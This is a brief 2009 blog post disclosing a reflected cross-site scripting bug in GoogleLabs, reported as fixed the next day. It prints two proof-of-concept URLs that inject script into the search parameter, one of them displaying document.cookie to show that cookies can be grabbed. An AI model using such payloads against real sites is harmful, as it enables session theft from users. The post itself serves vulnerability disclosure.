New critical XSS bug in GoogleLabs

Jun 29, 2009 | Category: Google Vulns

Our friend iter has discovered a vulnerability in GoogleLabs, which could be exploited by malicious people to conduct XSS attacks and Cookie Grabbing Attack.

XSS:

http://www.googlelabs.com/?q=%3Cscript%3Ealert(%2Fxss%2F)%3C%2Fscript%3E&apps=Search+Labs

http://www.googlelabs.com/?q=%3Cscript%3Ealert(document.cookie)%3B%3C%2Fscript%3E&apps=Search+Labs

STATUS: 30 june 1:18 amFIXED

xss_google_code_search

xss_google_code_search

Related posts:

  1. New critical XSS bug in Google Code Search
  2. XSS google.com
  3. Due nuove vulnerabilita’ per Google
  4. Google Sites Reflective Cross-Site Scripting
  5. Three new XSS of Google: Knol, Books and Google!

Bookmark and Share
Permalink Comments (0) Jun 29, 2009

Leave a Reply with your Google Account